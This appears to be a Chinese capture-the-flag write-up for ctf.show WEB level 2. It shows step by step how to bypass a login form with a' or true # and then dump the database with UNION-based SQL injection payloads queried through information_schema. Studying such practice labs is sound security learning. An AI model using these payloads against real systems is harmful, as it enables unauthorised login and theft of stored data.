ctfshow-WEB-web2

简介: ctf.show WEB模块第2关是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可

ctf.show WEB模块第2关是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可


image.png


在用户名的输入框中输入万能账号 a' or true #,密码随便输


image.png


登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中,既然有显示位,那我们就用联合注入进行脱库


image.png

首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输

a' union select 1,2,3 #

接下来,我们修改payload中2的位置,就可以将数据回显到页面中了,下面获取当前使用的数据库,盲猜flag就藏在当前使用的数据库中

a' union select 1,database(),3 #

image.png


数据库有了,接下来是脱表,在用户名的输入框中输入一下payload,密码还是随便输

a' union select 1,
(select group_concat(table_name) from information_schema.tables
where table_schema='web2')
,3 #

image.png

接下来获取flag表的字段

a' union select 1,
(select group_concat(column_name) from information_schema.columns
where table_schema='web2' and table_name='flag')
,3 #

image.png


接下来获取flag表的数据

a' union select 1,(select flag from flag),3 #

image.png


将flag的内容整体复制到输入框中即可过关



相关文章
|
5天前
|
安全 前端开发 PHP
LitCTF(web)
LitCTF(web)
16 3
|
2月前
|
PHP
【ctfshow】命令执行->web29-web44
【ctfshow】命令执行->web29-web44
57 0
|
2月前
|
SQL 存储 前端开发
LitCTF-web-WP(部分)
LitCTF-web-WP(部分)
67 0
|
11月前
|
安全 前端开发 PHP
ctfshow吃瓜杯 web
ctfshow吃瓜杯 web
81 0
|
11月前
|
安全 Docker 容器
kalmarCTF(WEB|EZ)WP
kalmarCTF(WEB|EZ)WP
76 0
|
PHP 数据安全/隐私保护 计算机视觉
ctfshow-web入门-(web21-28)
ctfshow web入门-题目(web21-28)的题解
258 1
|
安全
ctfshow-WEB-web4
tf.show WEB模块第4关是一个文件包含漏洞,页面提示了源码中的关键代码,使用include()函数接收url参数,include()函数包含的文件会被执行,从而造成任意代码执行,或者配合伪协议获取敏感文件甚至getshell; 然而这一关伪协议不起作用,我们可以通过日志注入进行任意命令执行,从而getshell
236 0
ctfshow-WEB-web4
|
SQL 安全 数据库
ctfshow-WEB-web6
ctf.show WEB模块第6关是一个SQL注入漏洞,注入点是单引号字符型注入,并且过滤了空格,我们可以使用括号()或者注释/**/绕过
270 0
ctfshow-WEB-web6
|
区块链
Web 3.0,究竟是什么?
Web 3.0,究竟是什么?
131 0
|
数据库连接 PHP 数据安全/隐私保护
ctfshow之web(9、10、11、12)
ctfshow之web(9、10、11、12)
137 0
ctfshow之web(9、10、11、12)